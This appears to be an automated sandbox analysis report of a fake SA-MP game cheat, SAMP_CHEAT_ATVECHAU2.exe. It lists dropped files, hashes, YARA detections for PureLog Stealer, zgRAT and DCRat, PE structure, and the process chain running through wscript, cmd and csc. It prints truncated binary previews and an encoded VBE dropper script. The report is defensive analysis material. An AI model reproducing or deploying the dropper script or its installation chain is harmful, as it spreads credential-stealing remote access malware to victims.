                                                  Preview:mhpDIya1jQQaEsL8zI0jXxwfDPm5CGXapQpaAPHRJGH7JTgH2YK9k5UzuJA2Mezc3zuyDv7jBjZQpzWutfDo6Y0u5zq1PPFpRpDTisDHbk7BfEJ5wQJqbKgf9A2NEFUvdu9AvDLAb5MVazO1quF9GYNGIiTi00CVQLhuEIJsEIPg8KFKvAgU9UpFh21NtnKk20EORdwhlW47JrI8cJwzTsV6gcNMR69b7ooHF12RN9tnZr5zu3uj0VQJeIrzPkQoXdAeDB2lQelU9sgygXbXLZlmXem6JDCntEQ6rbwtBITVt6Jwm3T1J2d72XHiZ5cNc8l5ckHFlrWDGP3bUzUPtKd0kSETTNUFpF3uUOTCwOQbga1meqNjlNdSfvUKfxvXXRXAWJGGgSdf3CTKabynAvecllPj3Jg8c3DPC0QVjHDSu8YcbJtD8HXmw5Yv3gNWveCA8DIkLdD2rLsnMwHtac9VgbcHbfbC4qgP6YeXBJ2fEe4lMviHZd6TfrehlAIpBA8BocryStsQjdQBg14q7UnbtNuO36wAANdDg26uEtzpuptBacAtGbsrXhSbsc4V6rQWANfn5KmNe8qDesya6D4jfvq8keBlydsDZWAN7Wy5zeMZ1O79oeZ3wq1OhgDaJBYBPmnHsldjP9uAiRHWhB7UEzQsfwpaTYwxGLJOkzRDA0ox61pQZq2HDD7aW4m55CP1

                                                  C:\msportComWin\BridgePortsurrogateserverref.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

                                                  C:\msportComWin\dadef09819bb09

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with very long lines (855), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):855
                                                  Entropy (8bit):5.9063512067828485
                                                  Encrypted:false
                                                  SSDEEP:24:gQimqzRqoJyWij1dnpChDQEXP7IXYcOITH3B+R65j:zxwRqJn0h0EXP8gYxEC
                                                  MD5:18D065D4C287BAAE75B1C91DEC6D17BA
                                                  SHA1:F641A93D8DC2973D4F1EB84F7829C48344C08660
                                                  SHA-256:642A77AB321A1EB054B14A656BCB25623CA63A3C7946DE3462DCB640D35C102C
                                                  SHA-512:45D304786B960169DF6D3363F5FD39D44A0498E8ED3AF14E6153C414B8EA15669BDE7B0362FF97C8BD65C0A489367535414DAD9C20C3C7E4788D28CDEC237DCE
                                                  Malicious:false
                                                  Preview:pIBnHLf4kaTtO7dqktPgZcHbtkCicvYnwmE3sOpJujjElpUrelodzVbMAk4gI6cyCq6l3k7WDGw03D0DQVE0G5xbL12ITIAxGuC4tsx3nSZtilT7t1Qx1lrG2faCryC4F8tJB5ThiKNyfD2ji5Zc2N5fC5COSuLyPfok2J5yhtPrY3lym0ewZjC1CNGG3FOx8Yi9ZSrY9k5I8OGITNmbQZYqdwhoDz4bebs9VlZTJFxzn33yH7wqdwgj92gnvDVJqeoggHxrySSLmjCj2thFDO8r5J9cEvhGunIJPWR9JE2KeV6a07uCfQGcg6lXHVnCuMa9b2Ugbh58VxNjMjmHAfkegqnSv42ybzZR4787mOk8UHGstBLhsfBPm6cuPCuhoGhgX5oOkpew5lJZk4ittVG5xKp8fOskdDTOkjUyW76DAPUAxCKUeAxTAlsNPqsW64S1S4zAkuXwYC5i0pLdDXGdPAO81HiqOjGG6cs2NKutnB47qKWkfPTjyzlRq0JcLrhz5zlX7TP2nWzOFQSqv7K9QhRH1aLWBSh6eFC1i8nM9a5cAXMaicrOgijXheggH31Vy2u9NbIwU89zmzHdOvxilTa5goTEbGEGiknHnMMHT43hjtvrWCSWFSuecydiHEUN43QBMA0BiqPqa3Wx3lrYxsAP0Jpyto9PjpnpctfWMRxYDDEicqpgW6ZL2ALCUBS4r9HuQqUJFVMg4mMxEGWD8c3nQbxcicBK93qE5TSwWfaBt3RQyX7OpO5OGeey31lnTChB5I1uxjrdC23WKgnLexeu8b8azd3e4xsrVPVqfNaGhbMNkHoWOaIghwDdKb5TqNjPKMB4L7pRWYMgPu0

                                                  C:\msportComWin\jnowHpJlZlXal.exe

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

                                                  C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):248
                                                  Entropy (8bit):5.994697168101575
                                                  Encrypted:false
                                                  SSDEEP:6:GQvwqK+NkLzWbHa/818nZNDd3RL1wQJRYmfvv9H4f7sIG/V:GQ2MCzWLaG4d3XBJzfvK8
                                                  MD5:528D2D62B3A0A43E28F6C5BC9E59FB49
                                                  SHA1:B8347B3F11FDB951BF4C930BEF813180C42F98C1
                                                  SHA-256:9D271DDB2A3DE2347DB1800F94865BAB4758E8F89760F7F0FC6368EB14A9597B
                                                  SHA-512:A208E41F97A080AB5550632DAA10AC7D4D43CA603207406DF14E749765662089F38FF52FECED3083DBCB08DAA2821E9FC6DF511FA1A1F18B4B9E8E38F68FA171
                                                  Malicious:false
                                                  Preview:#@~^3wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ:daWMYZK:qrxJzX9$*VL5+4\$n1%|&o%3^?m|.|OWS0oFM2KO pn"oVe*Xvt*Ie!VabS`,.jR(CYr~~!BPWC^/+X0cAAA==^#~@.

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.505318062567441
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File size:2'324'826 bytes
                                                  MD5:be4ae5e0b545e43608ae6a60ce297871
                                                  SHA1:ded512ee44ed38b7a6541b4e1d797387a27a5d93
                                                  SHA256:076c80010cb400aa03881eb5d88c6e2e4677c0d405255c48154bcf780e549533
                                                  SHA512:45aafc3ec5787b1bf143a1d6b9f8ce79447157879c684849486d87a3a7b357862688016809277ff2c9e57a6d06a0613e12009c5a279d07ced4ecc3b3bc9cd0c3
                                                  SSDEEP:24576:2TbBv5rUyXVoEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObx5:IBJvZ+qwOZFM+aJJbL+iNuuMxoyW29L
                                                  TLSH:9FB5C012B5D28E33C2A44731466B063D56A4DB263662EF6B360F20966D577F08F336B3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                  File Icon

                                                  Icon Hash:1515d4d4442f2d2d

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x41f530
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F9F00BE8D2Bh
                                                  jmp 00007F9F00BE863Dh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push dword ptr [ebp+08h]
                                                  mov esi, ecx
                                                  call 00007F9F00BDB487h
                                                  mov dword ptr [esi], 004356D0h
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  and dword ptr [ecx+04h], 00000000h
                                                  mov eax, ecx
                                                  and dword ptr [ecx+08h], 00000000h
                                                  mov dword ptr [ecx+04h], 004356D8h
                                                  mov dword ptr [ecx], 004356D0h
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  lea eax, dword ptr [esi+04h]
                                                  mov dword ptr [esi], 004356B8h
                                                  push eax
                                                  call 00007F9F00BEBACFh
                                                  test byte ptr [ebp+08h], 00000001h
                                                  pop ecx
                                                  je 00007F9F00BE87CCh
                                                  push 0000000Ch
                                                  push esi
                                                  call 00007F9F00BE7D89h
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007F9F00BDB402h
                                                  push 0043BEF0h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007F9F00BEB589h
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007F9F00BE8748h
                                                  push 0043C0F4h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007F9F00BEB56Ch
                                                  int3
                                                  jmp 00007F9F00BED007h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push 00422900h
                                                  push dword ptr fs:[00000000h]

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                  PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                  RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                  RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                  RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                  RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                  RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                  RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                  RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                  RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                  RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                  RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                  RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                  RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                  RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                  RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                  RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                  RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                  RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                  RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                  RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                  RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                  RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                  RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                  RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                  RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                  RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  No network behavior found

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:07:31:15
                                                  Start date:13/01/2025
                                                  Path:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe"
                                                  Imagebase:0xcf0000
                                                  File size:2'324'826 bytes
                                                  MD5 hash:BE4AE5E0B545E43608AE6A60CE297871
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:07:31:16
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"
                                                  Imagebase:0x1c0000
                                                  File size:147'456 bytes
                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:07:31:18
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
                                                  Imagebase:0x410000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:07:31:18
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:07:31:18
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\msportComWin/BridgePortsurrogateserverref.exe"
                                                  Imagebase:0xf10000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 83%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
                                                  Imagebase:0x7ff7842e0000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
